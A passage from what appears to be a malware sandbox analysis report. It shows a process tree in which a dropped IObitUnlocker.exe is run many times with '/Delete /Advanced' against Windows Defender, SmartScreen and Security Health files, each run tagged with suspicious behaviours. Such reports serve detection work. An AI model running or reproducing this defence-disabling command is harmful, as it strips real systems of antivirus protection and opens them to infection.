Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1576
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:552
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3904
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4556
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5712
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5376
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5372
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2900
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5900
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1732
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3176
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
